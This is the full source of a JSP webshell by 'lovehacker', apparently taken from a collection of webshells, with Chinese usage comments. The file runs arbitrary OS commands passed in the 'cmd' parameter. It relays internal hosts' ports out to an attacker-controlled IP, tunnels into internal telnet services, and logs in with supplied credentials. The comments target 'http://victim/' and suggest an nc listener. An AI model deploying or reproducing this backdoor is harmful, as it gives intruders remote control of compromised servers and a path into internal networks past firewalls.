webshell/jsp/hackk8/fuck-jsp/spjspshell.jsp
2013-05-28 11:29:04 +08:00

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<%
/*
* WEBSHELL.JSP
*
* Author: lovehacker
* E-mail: wangyun188@hotmail.com
*
* 使用方法:
* ]http://victim/webshell.jsp?[options]
* options:
* action=piped&remoteHost=&remotePort=&myIp=&myPort=
* action=tunnel&remoteHost=&remotePort=&myPort=
* action=login&username=&password=&myPort=
* action=send&myShell=&myPort=&cmd=
* action=close&myPort=
* action=shell&cmd=
* 例子:
* action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345 -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来可以先用NC监听12345端口。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口而防火墙又未过滤该WEB服务器向外的连接。
* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能但jsp功能有限实现起来较为复杂适用于你控制的机器只开了80端口并且防火墙不允许它访问Internet而你又非常想访问它内网某主机的Telnet服务:-)
* action=login&username=root&password=helloroot&myPort=65534 -- 上一步只是告诉了要Telnet那台机器这一步才开始真正登陆你要输入要telnet主机的正确的用户名密码才行喔要不然谁也没办法。
* action=send&myShell=&myPort=&cmd= -- 上一步如果顺利完成那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记否则无法知道数据流什么时间该结束一定要写对喔否则嘿嘿就麻烦罗。cmd这个参数就是你要执行的命令了比如“which ssh”建议你这样玩myShell=lovehacker&cmd=ls -la;echo lovehacker。
* action=close&myPort= -- 你是退出了telnet登陆但程序在主机上开放的端口还没关闭所以你要再执行这个命令现场打扫干净嘛。
* action=shell&cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini
* 程序说明:
* 想通过jsp实现telnet代理的时候着实头痛了一把每个请求都是一个新的线程client socket去连接
* telnet服务只能批量命令无法实现与用户的交互后来想了个笨办法把telnet的过程分步完成
* 收到tunnel命令后先起两个线程一个监听端口等待连接一个先和远程服务器建立好端口连接并一
* 直不断开这下server socket再一次一次的收数据一次次的转发到远程服务器就可以记录状态
* 现和用户的交互了但总觉得这办法太笨如果用JSP实现telnet代理功能你有更好的办法的话请一定
* 要来信告诉我。
* 版权说明:
* 本身实现Telnet的功能我也是在人家代码的基础上修改的所以版权没有你可以任意修改、复制。
* 只是加了新功能别忘了Mail一份给我喔
*
*
*/
%>
<%@ page import="java.io.*" %>
<%@ page import="java.net.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.awt.Dimension" %>
<%
class redirector implements Runnable
{
private redirector companion = null;
private Socket localSocket, remoteSocket;
private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector(Socket local, Socket remote)
{
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0)
break;
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
from.close();
to.close();
localSocket.close();
remoteSocket.close();
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class redirector1 implements Runnable
{
private redirector1 companion = null;
private Socket localSocket, remoteSocket;
private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector1(Socket local, Socket remote)
{
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector1 c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
String tmp = "";
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0) break;
tmp = new String(buffer);
if(tmp.startsWith("--GoodBye--"))
{
from.close();
to.close();
remoteSocket.close();
localSocket.close();
System.exit(1);
}
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class piped implements Runnable
{
String remoteHost1,remoteHost2;
int remotePort1, remotePort2;
Thread listener, connection;
public piped(String raddr1,int rport1, String raddr2, int rport2)
{
remoteHost1 = raddr1; remotePort1 = rport1;
remoteHost2 = raddr2; remotePort2 = rport2;
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket1 = null;
Socket destinationSocket2 = null;
try {
destinationSocket1 = new Socket(remoteHost1,remotePort1);
destinationSocket2 = new Socket(remoteHost2, remotePort2);
redirector r1 = new redirector(destinationSocket1, destinationSocket2);
redirector r2 = new redirector(destinationSocket2, destinationSocket1);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream());
os.writeChars("Remote host refused connection.\n");
destinationSocket2.close();
} catch(IOException ioe) { }
}
}
}
class tunnel implements Runnable
{
String remoteHost;
int localPort, remotePort;
Thread listener, connection;
ServerSocket server;
public tunnel(int lport, String raddr, int rport)
{
localPort = lport;
remoteHost = raddr; remotePort = rport;
try {
server = new ServerSocket(localPort);
} catch(Exception e) {}
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket = null;
try{
destinationSocket = new Socket(remoteHost, remotePort);
}catch(Exception e){}
while(true)
{
Socket localSocket = null;
try {
localSocket = server.accept();
} catch(Exception e) {
continue;
}
try {
redirector1 r1 = new redirector1(localSocket, destinationSocket);
redirector1 r2 = new redirector1(destinationSocket, localSocket);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(localSocket.getOutputStream());
os.writeChars("Remote host refused connection.\n");
localSocket.close();
} catch(IOException ioe) {}
continue;
}
}
}
}
class TelnetIO
{
public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; }
private int debug = 0;
private byte neg_state = 0;
private final static byte STATE_DATA = 0;
private final static byte STATE_IAC = 1;
private final static byte STATE_IACSB = 2;
private final static byte STATE_IACWILL = 3;
private final static byte STATE_IACDO = 4;
private final static byte STATE_IACWONT = 5;
private final static byte STATE_IACDONT = 6;
private final static byte STATE_IACSBIAC = 7;
private final static byte STATE_IACSBDATA = 8;
private final static byte STATE_IACSBDATAIAC = 9;
private byte current_sb;
private final static byte IAC = (byte)255;
private final static byte EOR = (byte)239;
private final static byte WILL = (byte)251;
private final static byte WONT = (byte)252;
private final static byte DO = (byte)253;
private final static byte DONT = (byte)254;
private final static byte SB = (byte)250;
private final static byte SE = (byte)240;
private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */
private final static byte TELOPT_EOR = (byte)25; /* end of record */
private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/
private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */
private final byte[] IACWILL = { IAC, WILL };
private final byte[] IACWONT = { IAC, WONT };
private final byte[] IACDO = { IAC, DO };
private final byte[] IACDONT = { IAC, DONT };
private final byte[] IACSB = { IAC, SB };
private final byte[] IACSE = { IAC, SE };
private final byte TELQUAL_IS = (byte)0;
private final byte TELQUAL_SEND = (byte)1;
private byte[] receivedDX;
private byte[] receivedWX;
private byte[] sentDX;
private byte[] sentWX;
private Socket socket;
private BufferedInputStream is;
private BufferedOutputStream os;
//private StatusPeer peer = this; /* peer, notified on status */
public void connect(String address, int port) throws IOException {
if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")");
socket = new Socket(address, port);
is = new BufferedInputStream(socket.getInputStream());
os = new BufferedOutputStream(socket.getOutputStream());
neg_state = 0;
receivedDX = new byte[256];
sentDX = new byte[256];
receivedWX = new byte[256];
sentWX = new byte[256];
}
public void disconnect() throws IOException {
if(debug > 0) System.out.println("TelnetIO.disconnect()");
if(socket !=null) socket.close();
}
public void connect(String address) throws IOException {
connect(address, 23);
}
//public void setPeer(StatusPeer obj) { peer = obj; }
public int available() throws IOException
{
return is.available();
}
public byte[] receive() throws IOException {
int count = is.available();
byte buf[] = new byte[count];
count = is.read(buf);
if(count < 0) throw new IOException("Connection closed.");
if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count);
buf = negotiate(buf, count);
return buf;
}
public void send(byte[] buf) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+buf+")");
os.write(buf);
os.flush();
}
public void send(byte b) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+b+")");
os.write(b);
os.flush();
}
private void handle_sb(byte type, byte[] sbdata, int sbcount)
throws IOException
{
if(debug > 1)
System.out.println("TelnetIO.handle_sb("+type+")");
switch (type) {
case TELOPT_TTYPE:
if (sbcount>0 && sbdata[0]==TELQUAL_SEND) {
String ttype;
send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS);
/* FIXME: need more logic here if we use
* more than one terminal type
*/
Vector vec = new Vector(2);
vec.addElement("TTYPE");
ttype = (String)notifyStatus(vec);
if(ttype == null) ttype = "dumb";
byte[] bttype = new byte[ttype.length()];
ttype.getBytes(0,ttype.length(), bttype, 0);
send(bttype);
send(IACSE);
}
}
}
public Object notifyStatus(Vector status) {
if(debug > 0)
System.out.println("TelnetIO.notifyStatus("+status+")");
return null;
}
private byte[] negotiate(byte buf[], int count) throws IOException {
if(debug > 1)
System.out.println("TelnetIO.negotiate("+buf+","+count+")");
byte nbuf[] = new byte[count];
byte sbbuf[] = new byte[count];
byte sendbuf[] = new byte[3];
byte b,reply;
int sbcount = 0;
int boffset = 0, noffset = 0;
Vector vec = new Vector(2);
while(boffset < count) {
b=buf[boffset++];
if (b>=128)
b=(byte)((int)b-256);
switch (neg_state) {
case STATE_DATA:
if (b==IAC) {
neg_state = STATE_IAC;
} else {
nbuf[noffset++]=b;
}
break;
case STATE_IAC:
switch (b) {
case IAC:
if(debug > 2)
System.out.print("IAC ");
neg_state = STATE_DATA;
nbuf[noffset++]=IAC;
break;
case WILL:
if(debug > 2)
System.out.print("WILL ");
neg_state = STATE_IACWILL;
break;
case WONT:
if(debug > 2)
System.out.print("WONT ");
neg_state = STATE_IACWONT;
break;
case DONT:
if(debug > 2)
System.out.print("DONT ");
neg_state = STATE_IACDONT;
break;
case DO:
if(debug > 2)
System.out.print("DO ");
neg_state = STATE_IACDO;
break;
case EOR:
if(debug > 2)
System.out.print("EOR ");
neg_state = STATE_DATA;
break;
case SB:
if(debug > 2)
System.out.print("SB ");
neg_state = STATE_IACSB;
sbcount = 0;
break;
default:
if(debug > 2)
System.out.print(
"<UNKNOWN "+b+" > "
);
neg_state = STATE_DATA;
break;
}
break;
case STATE_IACWILL:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = DO;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DO;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = DONT;
break;
}
if(debug > 1)
System.out.println("<"+b+", WILL ="+WILL+">");
if ( reply != sentDX[b+128] ||
WILL != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACWONT:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
reply = DONT;
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DONT;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = DONT;
break;
}
if ( reply != sentDX[b+128] ||
WONT != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACDO:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WILL;
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
break;
case TELOPT_TTYPE:
if(debug > 2)
System.out.println("TTYPE");
reply = WILL;
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
vec = new Vector(2);
vec.addElement("NAWS");
Dimension size = (Dimension)
notifyStatus(vec);
receivedDX[b] = DO;
if(size == null)
{
/* this shouldn't happen */
send(IAC);
send(WONT);
send(TELOPT_NAWS);
reply = WONT;
sentWX[b] = WONT;
break;
}
reply = WILL;
sentWX[b] = WILL;
sendbuf[0]=IAC;
sendbuf[1]=WILL;
sendbuf[2]=TELOPT_NAWS;
send(sendbuf);
send(IAC);send(SB);send(TELOPT_NAWS);
send((byte) (size.width >> 8));
send((byte) (size.width & 0xff));
send((byte) (size.height >> 8));
send((byte) (size.height & 0xff));
send(IAC);send(SE);
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[128+b] ||
DO != receivedDX[128+b]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentWX[b+128] = reply;
receivedDX[b+128] = DO;
}
neg_state = STATE_DATA;
break;
case STATE_IACDONT:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WONT;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
reply = WONT;
break;
default:
if(debug > 2)
System.out.println(
"<UNKNOWN,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[b+128] ||
DONT != receivedDX[b+128]
) {
send(IAC);send(reply);send(b);
sentWX[b+128] = reply;
receivedDX[b+128] = DONT;
}
neg_state = STATE_DATA;
break;
case STATE_IACSBIAC:
if(debug > 2) System.out.println(""+b+" ");
if (b == IAC) {
sbcount = 0;
current_sb = b;
neg_state = STATE_IACSBDATA;
} else {
System.out.println("(bad) "+b+" ");
neg_state = STATE_DATA;
}
break;
case STATE_IACSB:
if(debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBIAC;
break;
default:
current_sb = b;
sbcount = 0;
neg_state = STATE_IACSBDATA;
break;
}
break;
case STATE_IACSBDATA:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATAIAC;
break;
default:
sbbuf[sbcount++] = b;
break;
}
break;
case STATE_IACSBDATAIAC:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATA;
sbbuf[sbcount++] = IAC;
break;
case SE:
handle_sb(current_sb,sbbuf,sbcount);
current_sb = 0;
neg_state = STATE_DATA;
break;
case SB:
handle_sb(current_sb,sbbuf,sbcount);
neg_state = STATE_IACSB;
break;
default:
neg_state = STATE_DATA;
break;
}
break;
default:
if (debug > 2)
System.out.println(
"This should not happen: "+
neg_state+" "
);
neg_state = STATE_DATA;
break;
}
}
buf = new byte[noffset];
System.arraycopy(nbuf, 0, buf, 0, noffset);
return buf;
}
}
class TelnetConnect
{
TelnetIO tio = new TelnetIO();
int port = 0;
public TelnetConnect(int port)
{
this.port = port;
}
public void connect()
{
try {
tio.connect("localhost",port);
} catch(IOException e) {}
}
public void disconnect()
{
try{
tio.disconnect();
}catch(IOException e){}
}
private String wait(String prompt)
{
String tmp = "";
do {
try {
tmp += new String(tio.receive(), 0);
}catch(IOException e) {}
} while(tmp.indexOf(prompt) == -1);
return tmp;
}
private byte[] receive()
{
byte[] temp = null;
try{
temp = tio.receive();
}catch(IOException e){}
return temp;
}
private String waitshell()
{
String tmp = "";
do {
try { tmp += new String(tio.receive(), 0); }
catch(IOException e) {}
} while((tmp.indexOf("$") == -1)&&(tmp.indexOf("#") == -1)&&(tmp.indexOf("%") == -1));
return tmp;
}
private void send(String str)
{
byte[] buf = new byte[str.length()];
str.getBytes(0, str.length(), buf, 0);
try { tio.send(buf); } catch(IOException e) {}
}
}
%>
<%
String action = request.getParameter("action");
String cmd = request.getParameter("cmd");
String remoteHost = request.getParameter("remoteHost");
String myIp = request.getParameter("myIp");
String myPort = request.getParameter("myPort");
String remotePort = request.getParameter("remotePort");
String username = request.getParameter("username");
String password = request.getParameter("password");
String myShell = request.getParameter("myShell");
if(action.equals("shell")){
try {
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) { out.print((char)c); }
in.close();
try { child.waitFor();} catch (InterruptedException e) {}
} catch (IOException e) {}
}else if(action.equals("piped")){
piped me = new piped(remoteHost,Integer.parseInt(remotePort),myIp,Integer.parseInt(myPort));
}else if(action.equals("tunnel")){
tunnel me = new tunnel(Integer.parseInt(myPort),
remoteHost, Integer.parseInt(remotePort));
}else if(action.equals("login")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
out.print(tc.wait("login:"));
tc.send(username+"\r");
out.print(tc.wait("Password:"));
tc.send(password+"\r");
out.print(tc.waitshell());
tc.disconnect();
}else if(action.equals("send")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
tc.send(cmd+"\r");
if(!myShell.equals("logout"))
out.print(tc.wait(myShell));
tc.disconnect();
}else if(action.equals("close")){
try{
Socket s = new Socket("127.0.0.1",Integer.parseInt(myPort));
DataOutputStream dos = new DataOutputStream(s.getOutputStream());
PrintStream ps = new PrintStream(dos);
ps.println("--GoodBye--");
ps.close();
dos.close();
s.close();
}catch(Exception e){}
}else{
out.print("<Font color=black size=7>You Love Hacker Too?");
}
%>